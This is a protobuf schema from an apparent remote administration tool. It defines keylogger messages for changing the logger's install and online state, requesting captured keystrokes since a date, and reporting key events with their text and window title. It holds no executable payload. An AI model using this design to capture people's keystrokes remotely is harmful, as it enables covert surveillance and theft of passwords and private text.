src/main/proto/com/subterranean_security/crimson/core/net/sequences/Keylogger.proto

/******************************************************************************
 *                                                                            *
 *                    Copyright 2016 Subterranean Security                    *
 *                                                                            *
 *  Licensed under the Apache License, Version 2.0 (the "License");           *
 *  you may not use this file except in compliance with the License.          *
 *  You may obtain a copy of the License at                                   *
 *                                                                            *
 *      http://www.apache.org/licenses/LICENSE-2.0                            *
 *                                                                            *
 *  Unless required by applicable law or agreed to in writing, software       *
 *  distributed under the License is distributed on an "AS IS" BASIS,         *
 *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.  *
 *  See the License for the specific language governing permissions and       *
 *  limitations under the License.                                            *
 *                                                                            *
 *****************************************************************************/
syntax = "proto3";

package core.net.sequences;

option java_package = "com.subterranean_security.crimson.proto.core.net.sequences";

import "com/subterranean_security/crimson/core/Misc.proto";

enum State {
	UNINSTALLED = 0;
	OFFLINE = 1;
	ONLINE = 2;
}

enum Trigger {
	EVENT = 0;
	PERIODIC = 1;
}

message RQ_KeyloggerStateChange {
	State newState = 1;
}

message RS_KeyloggerStateChange {
	Outcome result = 1;
}

message RQ_KeyUpdate {
	int32 cid = 1;
	int64 start_date = 2;
}

message RS_KeyUpdate {
	bool result = 1;
	int32 events_sent = 2;
}

message EV_KEvent {
	int64 date = 1;
	string event = 2;
	string title = 3;
}